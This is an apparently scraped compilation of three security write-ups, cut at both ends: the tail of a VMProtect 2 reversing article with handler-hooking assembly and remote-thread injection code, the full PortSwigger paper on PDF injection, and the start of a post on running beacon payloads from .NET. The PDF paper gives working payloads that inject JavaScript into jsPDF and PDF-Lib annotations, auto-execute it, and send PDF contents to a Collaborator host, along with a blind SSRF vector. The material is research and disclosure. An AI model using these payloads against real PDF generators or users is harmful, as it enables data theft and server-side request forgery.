The result of this AND operation is then set into virtual scratch register seven (SREGDW 0x38). It is then moved into scratch register 16. If we look at the vmexit instruction and the order in which LREGQ’s are executed we can see that this is indeed correct.

Lastly, we can also see the ADD instruction and LVSP instruction which adds a value to VSP. This is expected as there is an ADD RSP, 0x10 in the original binary.

From the information above we can reconstruct the following native instructions:

sub rsp, 0x10
mov eax, 1
cpuid
shr ecx, 0x1C
and ecx, 1
mov eax, ecx ; from the LREGDW 0x38; SREGDW 0x80…
add rsp, 0x10
ret
As you can see there are a few instructions which are missing, particularly the push’s and pop’s of RBX, as well as the XOR to zero the contents of ECX. I assume that these instructions are not converted to virtual instructions directly and are instead implemented in a roundabout way.

Altering Virtual Instruction Results
In order to alter virtual instructions one must reimplement the entire vm handler first. If the vm handler decrypts a second operand one must remember the importance of the decryption key validity. Thus the original immediate value must be computed and applied to the decryption key via the original transformation. However this value can be subsequently discarded after updating the decryption key. An example of this could be altering the constant value from the LCONST prior to the SHR in the above section.

This virtual instruction has two operands, the first being the vm handler index to execute and the second being the immediate value which in this case is a single byte. Since there are two operands there will be five transformations inside of the vm handler.

We can recode this vm handler and compare the decrypted immediate value with 0x1C, then branch to a subroutine to load a different value onto the stack. This will then result in the SHR computing a different result. Essentially we can spoof the CPUID results. An alternative to this would be recreating the SHR handler, however for simplicity sake i’m just going to shift to a bit that is set. In this case bit 5 in ECX after CPUID is set if VMX is supported and since my CPU supports virtualization this bit will be high. Below is the new vm handler.

.data
__mbase dq 0h
public __mbase

.code
__lconstbzx proc
mov al, [rsi]
lea rsi, [rsi+1]
xor al, bl
dec al
ror al, 1
neg al
xor bl, al

pushfq            ; save flags...
cmp ax, 01Ch
je swap_val

                ; the constant is not 0x1C
popfq            ; restore flags...     
sub rbp, 2
mov [rbp], ax
mov rax, __mbase
add rax, 059FEh    ; calc jmp rva is 0x59FE...
jmp rax

swap_val: ; the constant is 0x1C
popfq ; restore flags…
mov ax, 5 ; bit 5 is VMX in ECX after CPUID…
sub rbp, 2
mov [rbp], ax
mov rax, __mbase
add rax, 059FEh ; calc jmp rva is 0x59FE…
jmp rax
__lconstbzx endp
end
If we now run the vm tracer again with this new vm handler being set to index 0x55 we should be able to see a change in LCONSTBZX. In order to facilitate this hook, one must set the virtual address of the new vm handler into a vm::handler::table_t object.

// change vm handler 0x55 (LCONSTBZX) to our implimentation of it…
auto _meta_data = handler_table.get_meta_data(0x55);
_meta_data.virt = reinterpret_cast(&__lconstbzx);
handler_table.set_meta_data(0x55, _meta_data);
If we run the binary now it will return 1. You can see this below.

Encoding Virtual Instructions — Inverse Transformations
Since VMProtect 2 generates a virtual machine which executes virtual instructions encoded in its own bytecode one could run their own virtual instructions on the VM if they can encode them. The encoded virtual instructions must also be within a 4gb address space range though as the RVA to the virtual instructions is 32bits wide. In this section I will encode a very simple set of virtual instructions to add two QWORD values together and return the result.

To begin, encoding virtual instructions requires that the vm handlers for said virtual instructions are inside of the binary. Locating these vm handlers is done by ‘vmprofiler’. The vm handler index is the first opcode and the immediate value, if any, is the second. Combining these two sets of operands will yield an encoded virtual instruction. This is the first stage of assembling virtual instructions, the second is encrypting the operands.

Once we have our encoded virtual instructions we can now encrypt them using the inverse operations of vm handler transformations as well as the inverse operations for calc_jmp. It’s important to note that the way in which VIP advances must be taken into consideration when encrypting as the order of operands and virtual instructions depends on this advancement direction.

In order to execute these newly assembled virtual instructions, one must put the virtual instructions within a 32bit address range of the vm_entry routine, then put the encrypted rva to these virtual instructions onto the stack, and lastly call into vm_entry. I would suggest using VirtualAllocEx to allocate a RW page directly below the protected module. An example for running virtual instructions is displayed below.

SIZE_T bytes_copied;
STARTUPINFOA info = { sizeof info };
PROCESS_INFORMATION proc_info;

// start the protected binary suspended…
// keep in mind this binary is not packed…
CreateProcessA(«vmptest.vmp.exe», nullptr, nullptr,
nullptr, false,
CREATE_SUSPENDED | CREATE_NEW_CONSOLE,
nullptr, nullptr, &info, &proc_info);

// wait for the system to finish setting up…
WaitForInputIdle(proc_info.hProcess, INFINITE);
auto module_base = get_process_base(proc_info.hProcess);

// allocate space for the virtual instructions below the module…
auto virt_instrs = VirtualAllocEx(proc_info.hProcess,
module_base + vmasm->header->offset,
vmasm->header->size,
MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

// write the virtual instructions…
WriteProcessMemory(proc_info.hProcess, virt_instrs,
vmasm->data, vmasm->header->size, &bytes_copied);

// create a thread to run the virtual instructions…
auto thandle = CreateRemoteThread(proc_info.hProcess,
nullptr, 0u,
module_base + vm_entry_rva,
nullptr, CREATE_SUSPENDED, &tid);

CONTEXT thread_ctx;
GetThreadContext(thandle, &thread_ctx);

// sub rsp, 8…
thread_ctx.Rsp -= 8;
thread_ctx.Rip = module_base + vm_entry_rva;

// write encrypted rva onto the stack…
WriteProcessMemory(proc_info.hProcess, thread_ctx.Rsp,
&vmasm->header->encrypted_rva,
sizeof vmasm->header->encrypted_rva, &bytes_copied);

// update thread context and resume execution…
SetThreadContext(thandle, &thread_ctx);
ResumeThread(thandle);
Conclusion — Static Analysis, Dynamic Analysis
To conclude, my dynamic analysis solution is not the most ideal solution, however It should allow for basic reverse engineering of protected binaries. With more time static analysis of virtual instructions will become possible, however for the time being dynamic analysis will have to do. In the future I will be using unicorn to emulate the virtual machine handlers.

Although I have documented a handful of virtual instructions there are many more that I have not documented. The goal of documenting the virtual instructions that I have is to allow the reader of this article to obtain a feel for how vm handlers should look as well as how one could alter the results of these vm handlers. The documented virtual instructions in this article are also the most common ones. These virtual instructions will most likely be inside of every virtual machine.

I have added a handful of reference builds inside of the repository for you to try your hand at making them return 1 by altering vm handlers. There is also a build which uses multiple virtual machines in a single binary.

Lastly, I would like to restate that this research has most definitely already been done by private entities, and I am not the first to document some of the virtual machine architecture discussed in this post. I have credited those whom I have studied the research of already, however there are probably many more people that have done research on VMProtect 2 that I have not listed simply because I have not come across their work.

Portable Data exFiltration: XSS for PDFs

Portable Data exFiltration: XSS for PDFs

Original text by Gareth Heyes

Abstract

PDF documents and PDF generators are ubiquitous on the web, and so are injection vulnerabilities. Did you know that controlling a measly HTTP hyperlink can provide a foothold into the inner workings of a PDF? In this paper, you will learn how to use a single link to compromise the contents of a PDF and exfiltrate it to a remote server, just like a blind XSS attack.

I’ll show how you can inject PDF code to escape objects, hijack links, and even execute arbitrary JavaScript — basically XSS within the bounds of a PDF document. I evaluate several popular PDF libraries for injection attacks, as well as the most common readers: Acrobat and Chrome’s PDFium. You’ll learn how to create the «alert(1)» of PDF injection and how to improve it to inject JavaScript that can steal the contents of a PDF on both readers.

I’ll share how I was able to use a custom JavaScript enumerator on the various PDF objects to discover functions that make external requests, enabling me to to exfiltrate data from the PDF. Even PDFs loaded from the filesystem in Acrobat, which have more rigorous protection, can still be made to make external requests. I’ve successfully crafted an injection that can perform an SSRF attack on a PDF rendered server-side. I’ve also managed to read the contents of files from the same domain, even when the Acrobat user agent is blocked by a WAF. Finally, I’ll show you how to steal the contents of a PDF without user interaction, and wrap up with a hybrid PDF that works on both PDFium and Acrobat.

This whitepaper is also available as a printable PDF, and as a «director’s cut» edition of a presentation premiered at Black Hat Europe 2020:

Introduction

It all started when my colleague, James «albinowax» Kettle, was watching a talk on PDF encryption at BlackHat. He was looking at the slides and thought «This is definitely injectable». When he got back to the office, we had a discussion about PDF injection. At first, I dismissed it as impossible. You wouldn’t know the structure of the PDF and, therefore, wouldn’t be able to inject the correct object references. In theory, you could do this by injecting a whole new xref table, but this won’t work in practice as your new table will simply be ignored… Here at PortSwigger, we don’t stop there; we might initially think an idea is impossible but that won’t stop us from trying.

Before I began testing, I had a couple of research objectives in mind. Given user input into a PDF, could I break it and cause parsing errors? Could I execute JavaScript or exfiltrate the contents of the PDF? I wanted to test two different types of injection: informed and blind. Informed injection refers to cases where I knew the structure of the PDF (for example, because I was able to view the resulting PDF myself). With blind injection, I had no knowledge at all of the PDF’s structure or contents, much like blind XSS.

Injection theory

How can user input get inside PDFs?

Server-side PDF generation is everywhere; it’s in e-tickets, receipts, boarding passes, invoices, pay slips…the list goes on. So there’s plenty of opportunity for user input to get inside a PDF document. The most likely targets for injection are text streams or annotations as these objects allow developers to embed text or a URI, enclosed within parentheses. If a malicious user can inject parentheses, then they can inject PDF code and potentially insert their own harmful PDF objects or actions.

Why try to inject PDF code?

Consider an application where multiple users work on a shared PDF containing sensitive information, such as bank details. If you are able to control part of that PDF via an injection, you could potentially exfiltrate the entire contents of the file when another user accesses it or interacts with it in some way. This works just like a classic XSS attack but within the scope of a PDF document.

Why can’t you inject arbitrary content?

Think about PDF injection just like an XSS injection inside a JavaScript function call. In this case, you would need to ensure that your syntax was valid by closing the parentheses before your injection and repairing the parentheses after your injection. The same principle applies to PDF injection, except you are injecting inside a dictionary value, such as a text stream or annotation URI, rather than a function call.

Methodology

Methodology

I have devised the following methodology for PDF injection: Identify, Construct, and Exploit.

Identify

First of all, you need to identify whether the PDF generation library is escaping parentheses or backslashes. You can also try to generate these characters by using multi-byte characters that contain 0x5c (backslash) or 0x29 (parenthesis) in the hope the library incorrectly converts them to single-byte characters. Another possible method of generating parentheses or backslashes is to use characters outside the ASCII range. This can cause an overflow if the library incorrectly handles the character. You should then see if you can break the PDF structure by injecting a NULL character, EOF markers, or comments.

Construct

Once you’ve established that you can influence the structure of the PDF, you need to construct an injection that confirms you control part of it. This can be done by calling «app.alert(1)» in PDF JavaScript or by using the submitForm action/function to make a POST request to an external URL. This is useful for blind injection scenarios.

Exploit

Once you’ve confirmed that an injection is possible, you can try to exploit it to exfiltrate the contents of the PDF. Depending on whether you’re injecting the SubmitForm action or using the submitForm JavaScript function, you need to send the correct flags or parameters. I’ll show you how to do this later on in the paper when I cover how to exploit injections.

Vulnerable libraries

I tried around 8 different libraries while conducting this research. Of these, I found two that were vulnerable to PDF injection: PDF-Lib and jsPDF, both of which are npm modules. PDF-Lib has over 52k weekly downloads and jsPDF has over 250k. Each library seems to correctly escape text streams but makes the mistake of allowing PDF injection inside annotations. Here is an example of how you create annotations in PDF-Lib: const linkAnnotation = pdfDoc.context.obj({
  Type: 'Annot',
  Subtype: 'Link',
  Rect: [50, height - 95, 320, height - 130],
  Border: [0, 0, 2],
  C: [0, 0, 1],
  A: {
    Type: 'Action',
    S: 'URI',
    URI: PDFString.of(`/input`),//vulnerable code
  }
  })

As you can see in the code sample, PDF-Lib has a helper function to generate PDF strings, but it doesn’t escape parentheses. So if a developer places user input inside a URI, an attacker can break out and inject their own PDF code. The other library, jsPDF, has the same problem, but this time in the url property of their annotation generation code: var doc = new jsPDF();
doc.text(20, 20, 'Hello world!');
doc.addPage('a6','l');
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:'/input'});//vulnerable code

Exploiting injections

Before I demonstrate the vectors I found, I’m going to walk you through the journey I took to find them. First, I’ll talk about how I tried executing JavaScript and stealing the contents of the PDF from an injection. I’ll show you how I solved the problem of tracking and exfiltrating a PDF when opened from the filesystem on Acrobat, as well as how I was able to execute annotations without requiring user interaction. After that I’ll discuss why these injections fail on Chrome and how to make them work. I hope you will enjoy my journey of exploiting injections.

Acrobat

The first step was to test a PDF library, so I downloaded PDFKit, created a bunch of test PDFs, and looked at the generated output. The first thing that stood out was text objects. If you have an injection inside a text stream then you can break out of the text using a closing parenthesis and inject your own PDF code.

A PDF text object looks like the following:

Diagram of a PDF text stream

BT indicates the start of a text object, /F13 sets the font, 12 specifies the size, and Tf is the font resource operator (it’s worth noting that in PDF code, the operators tend to follow their parameters).

The numbers that follow Tf are the starting position on the page; the Td operator specifies the position of the text on the page using those numbers. The opening parenthesis starts the text that’s going to be added to the page, «ABC» is the actual text, then the closing parenthesis finishes the text string. Tj is the show text operator and ET ends the text object.

Controlling the characters inside the parentheses could enable us to break out of the text string and inject PDF code.

I tried all the techniques mentioned in my methodology with PDFKit, PDF Make, and FPDF, and got nowhere. At this point, I parked the research and did something else for a while. I often do this if I reach a dead-end. It’s no good wasting time on research that is going nowhere if nothing works. I find coming back to later with a fresh mind helps a lot. Being persistent is great, but don’t fall into the trap of being repetitive without results.

PDF-Lib

With a fresh mind, I picked up the research again and decided to study the PDF specification. Just like with XSS, PDF injections can occur in different contexts. So far, I’d only looked at text streams, but sometimes user input might get placed inside links. Annotations stood out to me because they would allow developers to create anchor-like links on PDF text and objects. By now I was on my 4th PDF library. This time, I was using PDFLib. I took some time to use the library to create an annotation and see if I could inject a closing parenthesis into the annotation URI — and it worked! The sample vulnerable code I used to generate the annotation code was:...  
A: {
    Type: 'Action',
    S: 'URI',
    URI: PDFString.of(`injection)`),
  }
  })
...

Full code:

How did I know the injection was successful? The PDF would render correctly unless I injected a closing parenthesis. This proved that the closing parenthesis was breaking out of the string and causing invalid PDF code. Breaking the PDF was nice, but I needed to ensure I could execute JavaScript of course. I looked at the rendered PDF code and noticed the output was being encoded using the FlateDecode filter. I wrote a little script to deflate the block and the output of the annotation section looked like this:<<
/Type /Annot
/Subtype /Link
/Rect [ 50 746.89 320 711.89 ]
/Border [ 0 0 2 ]
/C [ 0 0 1 ]
/A <<
/Type /Action
/S /URI
/URI (injection))
>>
>>

As you can clearly see, the injection string is closing the text boundary with a closing parenthesis, which leaves an existing closing parenthesis that causes the PDF to be rendered incorrectly:

Screenshot showing an error dialog when loading the PDF

Great, so I could break the rendering of the PDF, now what? I needed to come up with an injection that called some JavaScript — the alert(1) of PDF injection.

Just like how XSS vectors depend on the browser’s parsing, PDF injection exploitability can depend on the PDF renderer. I decided to start by targeting Acrobat because I thought the vectors were less likely to work in Chrome. Two things I noticed: 1) You could inject additional annotation actions and 2) if you repair the existing closing parenthesis then the PDF would render. After some experimentation, I came up with a nice payload that injected an additional annotation action, executed JavaScript, and repaired the closing parenthesis:/blah)>>/A<</S/JavaScript/JS(app.alert(1);)/Type/Action>>/>>(

First I break out of the parenthesis, then break out of the dictionary using >> before starting a new annotation dictionary. The /S/JavaScript makes the annotation JavaScript-based and the /JS is where the JavaScript is stored. Inside the parentheses is our actual JavaScript. Note that you don’t have to escape the parentheses if they’re balanced. Finally, I add the type of annotation, finish the dictionary, and repair the closing parenthesis. This was so cool; I could craft an injection that executed JavaScript but so what, right? You can execute JavaScript but you don’t have access to the DOM, so you can’t read cookies. Then James popped up and suggested stealing the contents of the PDF from the injection. I started looking at ways to get the contents of a PDF. In Acrobat, I discovered that you can use JavaScript to submit forms without any user interaction! Looking at the spec for the JavaScript API, it was pretty straightforward to modify the base injection and add some JavaScript that would send the entire contents of the PDF code to an external server in a POST request:/blah)>>/A<</S/JavaScript/JS(app.alert(1);
this.submitForm({
cURL: 'https://your-id.burpcollaborator.net',cSubmitAs: 'PDF'}))
/Type/Action>>/>>(

The alert is not needed; I just added it to prove the injection was executing JavaScript.

Next, just for fun, I looked at stealing the contents of the PDF without using JavaScript. From the PDF specification, I found out that you can use an action called SubmitForm. I used this in the past when I constructed a PDF for a scan check in Burp Suite. It does exactly what the name implies. It also has a Flags entry in the dictionary to control what is submitted. The Flags dictionary key accepts a single integer value, but each individual setting is controlled by a binary bit. A good way to work with these settings is using the new binary literals in ES6. The binary literal should be 14 bits long because there are 14 flags in total. In the following example, all of the settings are disabled:0b00000000000000

To set a flag, you first need to look up its bit position (table 237 of the PDF specification). In this case, we want to set the SubmitPDF flag. As this is controlled by the 9th bit, you just need to count 9 bits from the right:0b00000100000000

If you evaluate this with JavaScript, this results in the decimal value 256. In other words, setting the Flags entry to 256 will enable the SubmitPDF flag, which causes the contents of the PDF to be sent when submitting the form. All we need to do is use the base injection we created earlier and modify it to call the SubmitForm action instead of JavaScript:/blah)>>/A<</S/SubmitForm/Flags 256/F(
https://your-id.burpcollaborator.net)
/Type/Action>>/>>(

jsPDF

Next I applied my methodology to another PDF library — jsPDF — and found it was vulnerable too. Exploiting this library was quite fun because they have an API that can execute in the browser and will allow you to generate the PDF in real time as you type. I noticed that, like the PDP-Lib library, they forgot to escape parentheses inside annotation URLs. Here the url property was vulnerable:doc.createAnnotation({bounds:
{x:0,y:10,w:200,h:200},
type:'link',url:`/input`});
//vulnerable

So I generated a PDF using their API and injected PDF code into the url property:var doc = new jsPDF();
doc.text(20, 20, 'Hello world!');
doc.addPage('a6','l');
doc.createAnnotation({bounds:
{x:0,y:10,w:200,h:200},type:'link',url:`
/blah)>>/A<</S/JavaScript/JS(app.alert(1);)/Type/Action/F 0/(
`});

I reduced the vector by removing the type entries of the dictionary and the unneeded F entry. I then left a dangling parenthesis that would be closed by the existing one. Reducing the size of the injection is important because the web application you are injecting to might only allow a limited amount of characters./blah)>>/A<</S/JavaScript/JS(app.alert(1)

I then worked out that it was possible to reduce the vector even further! Acrobat would allow a URI and a JavaScript entry within one annotation action and would happily execute the JavaScript:/)/S/JavaScript/JS(app.alert(1)

Further research revealed that you can also inject multiple annotations. This means that instead of just injecting an action, you could break out of the annotation and define your own rect coordinates to choose which section of the document would be clickable. Using this technique, I was able to make the entire document clickable. /) >> >>
<</Type /Annot /Subtype /Link /Rect [0.00 813.54 566.93 -298.27] /Border [0 0
0] /A <</S/SubmitForm/Flags 0/F(https://your-id.burpcollaborator.net

Writing an enumerator

The next stage was to look at how Acrobat handles PDFs that are loaded from the filesystem, rather than being served directly from a website. In this case, there are more restrictions in place. For example, when you try to submit a form to an external URL, this will now trigger a prompt in which the user has to manually confirm that they want to submit the form. To get around these restrictions I wrote an enumerator/fuzzer to call every function on every object to see if a function would allow me to contact an external server without user interaction.var doc = new jsPDF();
doc.text(20, 20, 'Hello world!');
doc.addPage('a6','l');
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/blah)>>/A<</S/JavaScript/JS(
    ...
    for(i in obj){
        try {
            if(i==='console' || i === 'getURL' || i === 'submitForm'){
                continue;
            }
            if(typeof obj[i] != 'function') {
                console.println(i+'='+obj[i]);
            }
            try {
                console.println('call:'+i+'=>'+'='+obj[i]('http://your-id-'+i+'.burpcollaborator.net?'+i,2,3));
...

Full code

The enumerator first runs a for loop on the global object «this». I skipped the methods getURL, submitForm, and the console object because I knew that they cause prompts and do not allow you to contact external servers unless you click allow. Try-catch blocks are used to prevent the loop from failing if an exception is thrown because the function can’t be called or the property isn’t a valid function. Burp Collaborator is used to see whether the server was contacted successfully — I add the key being checked in the subdomain so that Collaborator will show which property allowed the interaction.

Using this fuzzer, I discovered a method that can be called that contacts an external server: CBSharedReviewIfOfflineDialog will cause a DNS interaction without requiring the user to click allow. You could then use DNS to exfiltrate the contents of the PDF or other information. However, this still requires a click since our injection uses an annotation action.

Executing annotations without interaction

So far, the vectors I’ve demonstrated require a click to activate the action from the annotation. Typically, James asked the question «Can we execute automatically?». I looked through the PDF specification and noticed some interesting features of annotations:

«The PV and PI entries allow a distinction between pages that are open and pages that are visible. At any one time, only a single page is considered open in the viewer application, while more than one page may be visible, depending on the page layout.»

We can add the PV entry to the dictionary and the annotation will fire on Acrobat automatically! Not only that, but we can also execute a payload automatically when the PDF document is closed using the PC entry. An attacker could track you when you open the PDF and close it.

Here’s how to execute automatically from an annotation:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/)
>> >>
<</Subtype /Screen /Rect [0 0 900 900] /AA <</PV <</S/JavaScript/JS(app.alert(1))>>/(`});
doc.text(20, 20, 'Auto execute');

When you close the PDF, this annotation will fire:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>
<</Subtype /Screen /Rect [0 0 900 900] /AA <</PC <</S/JavaScript/JS(app.alert(1))>>/(`});
doc.text(20, 20, 'Close me');

Chrome

I’ve talked a lot about Acrobat but what about PDFium (Chrome’s PDF reader)? Chrome is tricky; the attack surface is much smaller as its JavaScript support is more limited than Acrobat’s. The first thing I noticed was that JavaScript wasn’t being executed in annotations at all, so my proof of concepts weren’t working. In order to get the vectors working in Chrome, I needed to at least execute JavaScript inside annotations. First though, I decided to try and overwrite a URL in an annotation. This was pretty easy. I could use the base injection I came up with before and simply inject another action with a URI entry that would overwrite the existing URL:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/blah)>>/A<</S/URI/URI(https://portswigger.net)
/Type/Action>>/F 0>>(`});
doc.text(20, 20, 'Test text');

This would navigate to portswigger.net when clicked. Then I moved on and tried different injections to call JavaScript, but this would fail every time. I thought it was impossible to do. I took a step back and tried to manually construct an entire PDF that would call JavaScript from a click in Chrome without an injection. When using an AcroForm button, Chrome would allow JavaScript execution, but the problem was it required references to parts of the PDF. I managed to craft an injection that would execute JavaScript from a click on JSPDF:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0.825 0.8275 0.8275]/CA(Submit)>>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<</N <</Type/XObject/BBox[ 0 0 72 21.6]/Subtype/Form>>>>/Parent <</Kids[ 3 0 R]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(app.alert(1))/Type/Action/F 4/DA(blah`});
doc.text(20, 20, 'Click me test');

As you can see, the above vector requires knowledge of the PDF structure. [ 3 0 R] refers to a specific PDF object and if we were doing a blind PDF injection attack, we wouldn’t know the structure of it. Still, the next stage is to try a form submission. We can use the submitForm function for this, and because the annotation requires a click, Chrome will allow it:/) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0.0 813.54 566.93 -298.27]/CA(Submit)>>/Rect [ 72 697.8898 144 676.2897]/Subtype/Widget/AP<</N <</Type/XObject/BBox[ 0 0 72 21.6]/Subtype/Form>>>>/Parent <</Kids[ 3 0 R]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(app.alert(1);this.submitForm('https://your-id.burpcollaborator.net'))/Type/Action/F 4/DA(blah

This works, but it’s messy and requires knowledge of the PDF structure. We can reduce it a lot and remove the reliance on the PDF structure:#) >> >> <</BS<</S/B/W 0>>/Type/Annot/MK<</BG[ 0 0 889 792]/CA(Submit)>>/Rect [ 0 0 889 792]/Subtype/Widget/AP<</N <</Type/XObject/Subtype/Form>>>>/Parent <</Kids[ ]/Ff 65536/FT/Btn/T(test)>>/H/P/A<</S/JavaScript/JS(
    app.alert(1)
    )/Type/Action/F 4/DA(blah

There’s still some code we can remove:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>>>><</Type/Annot/Rect[ 0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(A)>>/A<</S/JavaScript/JS(app.alert(1))/(`});
doc.text(20, 20, 'Test text');

The code above breaks out of the annotation, creates a new one, and makes the entire page clickable. In order for the JavaScript to execute, we have to inject a button and give it any text using the «T» entry. We can then finally inject our JavaScript code using the JS entry in the dictionary. Executing JavaScript on Chrome is great. I never thought it would be possible when I started this research.

Next I looked at the submitForm function to steal the contents of the PDF. We know that we can call the function and it does contact an external server, as demonstrated in one of the examples above, but does it support the full Acrobat specification? I looked at the source code of PDFium but the function doesn’t support SubmitAsPDF 🙁 You can see it supports FDF, but unfortunately this doesn’t submit the contents of the PDF. I looked for other ways but I didn’t know what objects were available. I took the same approach I did with Acrobat and wrote a fuzzer/enumerator to find interesting objects. Getting information out of Chrome was more difficult than Acrobat; I had to gather information in chunks before outputting it using the alert function. This was because the alert function truncated the string sent to it....
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(
(function(){
var obj = this,
    data = '',
    chunks = [],
    counter = 0,
    added = false, i, props = [];
    for(i in obj) {
        props.push(i);
    }
...

Full code

Inspecting the output of the enumerator, I tried calling various functions in the hope of making external requests or gathering information from the PDF. Eventually, I found a very interesting function called getPageNthWord, which could extract words from the PDF document, thereby allowing me to steal the contents. The function has a subtle bug where the first word sometimes will not be extracted. But for the most part, it will extract the majority of words:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)>> <</Type/Annot/Rect[0 0 900 900]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(
words = [];
for(page=0;page<this.numPages;page++) {
    for(wordPos=0;wordPos<this.getPageNumWords(page);wordPos++) {
        word = this.getPageNthWord(page, wordPos, true);
        words.push(word);
    }
}
app.alert(words);
    `});
doc.text(20, 20, 'Click me test');
doc.text(20, 40, 'Abc Def');
doc.text(20, 60, 'Some word');

I was pretty pleased with myself that I could steal the contents of the PDF on Chrome as I never thought this would be possible. Combining this with the submitForm vector would enable you to send the data to an external server. The only downside is that it requires a click. I wondered if you could get JavaScript execution without a click on Chrome. Looking at the PDF specification again, I noticed that there is another entry in the annotation dictionary called «E», which will execute the annotation when the mouse enters the annotation area — basically a mouseover event. Unfortunately, this does not count as user interaction to enable a form submission. So although you can execute JavaScript, you can’t do anything with the data because you can’t send it to an external server. If you can get Chrome to submit data with this event, please let me know because I’d be very interested to hear how. Anyway, here is the code to trigger a mouseover acton:var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`/) >> >>
<</Type /Annot /Subtype /Widget /Parent<</FT/Btn/T(a)>> /Rect [0 0 900 900] /AA <</E <</S/JavaScript/JS(app.alert(1))>>/(`});
doc.text(20, 20, 'Test');

SSRF in PDFium/Acrobat

It’s possible to send a POST request with PDFium/Acrobat to perform a SSRF attack. This would be a blind SSRF since you can make a POST request but can’t read the response. To construct a POST request, you can use the /parent dictionary key as demonstrated earlier to assign a form element to the annotation, enabling JavaScript execution. But instead of using a button like we did before, you can assign a text field (/Tx) with the parameter name (/T) and parameter value (/V) dictionary keys. Notice how you have to pass the parameter names you want to use to the submitForm function as an array:#)>>>><</Type/Annot/Rect[ 0 0 900 900]/Subtype/Widget/Parent<</FT/Tx/T(foo)/V(bar)>>/A<</S/JavaScript/JS(
app.alert(1);
this.submitForm('https://aiws4u6uubgfdag94xvc5wbrfilc91.burpcollaborator.net', false, false, ['foo']);
)/(

You can even send raw new lines, which could be useful when chaining other attacks such as request smuggling. The result of the POST request can be seen in the following Collaborator request:

Screen shot showing a Burp Collaborator request from a PDF

Finally, I want to finish with a hybrid Chrome and Acrobat PDF injection. The first part injects JavaScript into the existing annotation to execute JavaScript on Acrobat. The second part breaks out of the annotation and injects a new annotation that defines a new clickable area for Chrome. I use the Acroform trick again to inject a button so that the JavaScript will execute: var doc = new jsPDF();
doc.createAnnotation({bounds:{x:0,y:10,w:200,h:200},type:'link',url:`#)/S/JavaScript/JS(app.alert(1))/Type/Action>> >> <</Type/Annot/Rect[0 0 900 700]/Subtype/Widget/Parent<</FT/Btn/T(a)>>/A<</S/JavaScript/JS(app.alert(1)`});
doc.text(20, 20, 'Click me Acrobat');
doc.text(20, 60, 'Click me Chrome');

PDF upload «formcalc» technique

While conducting this research, I encountered an HR application that allowed uploading of PDF documents. The PDF wasn’t validated by the application and allowed arbitrary JavaScript to be embedded in the PDF file. I remembered a fantastic technique by @InsertScript that enabled you to make requests from a PDF file to read same origin resources using formcalc.

I tried this attack but it failed because the WAF was blocking requests from the Acrobat user agent. Then I tried cached resources and discovered this would be completely missed by the WAF — it would never see a request because the resource was loaded through the cache. I attempted to use this technique with PDF injection but, unfortunately, I couldn’t figure out a way of injecting formcalc or calling formcalc from JavaScript without using the AcroForm dictionary key in the trailer. If anyone manages to do this then please get in touch because I’d be super interested.

Defence

If you are writing a PDF library, it’s recommended that you escape parentheses and backslashes when accepting user input within text streams or annotation URIs. As a developer, you can use the injections mentioned in this paper to confirm that any user input doesn’t cause PDF injection. Consider performing validation on any content going into PDFs to ensure you can’t inject PDF code.

Conclusion

  • Vulnerable libraries can make user input inside PDFs dangerous by not escaping parentheses and backslashes.
  • A clear objective helps when tackling seemingly impossible problems and persistence pays off when trying to achieve those goals.
  • One simple link can compromise the entire contents of an unknown PDF.

Example files

You can download all the injection examples in this whitepaper at:

https://github.com/PortSwigger/portable-data-exfiltration/tree/main/PDF-research-samples

Acknowledgements

I knew nothing about the structure of PDFs until I watched a talk about building your own PDF manually by Ange Albertini. He is a great inspiration to me and without his learning materials this post would never have been made. I’d also like to credit Alex «InsertScript» Inführ, who covered PDFs in his mess with the web presentation. It blew everyone’s mind when he demonstrated how much a PDF was able to do. Thank you to both of you. I’d also like to thank Ben Sadeghipour & Cody Brocious for the idea of performing a SSRF attack from a PDF in their excellent presentation.

Addendum

Adobe has released a patch which addresses the CBSharedReviewIfOfflineDialog information disclosure.

Weird Ways to Run Unmanaged Code in .NET

Weird Ways to Run Unmanaged Code in .NET

Original text by Adam Chester

Ever since the release of the .NET framework, the offensive security industry has spent a considerable amount of time crafting .NET projects to accommodate unmanaged code. Usually this comes in the form of a loader, wrapping payloads like Cobalt Strike beacon and invoking executable memory using a few P/Invoke imports. But with endless samples being studied by defenders, the process of simply dllimport’ing Win32 APIs has become more of a challenge, giving rise to alternate techniques such as D/Invoke.

Recently I have been looking at the .NET Common Language Runtime (CLR) internals and wanted to understand what further techniques may be available for executing unmanaged code from the managed runtime. This post contains a snippet of some of the weird techniques that I found.

The samples in this post will focus on .NET 5.0 executing x64 binaries on Windows. The decision by Microsoft to unify .NET means that moving forwards we are going to be working with a single framework rather than the current fragmented set of versions we’ve been used to. That being said, all of the areas discussed can be applied to earlier versions of the .NET framework, other architectures and operating systems… let’s get started.

A Quick History Lesson

What are we typically trying to achieve when executing unmanaged code in .NET? Often for us as Red Teamer’s we are looking to do something like running a raw beacon payload, where native code is executed from within a C# wrapper.

For a long time, the most common way of doing this looked something like:

[DllImport("kernel32.dll")]
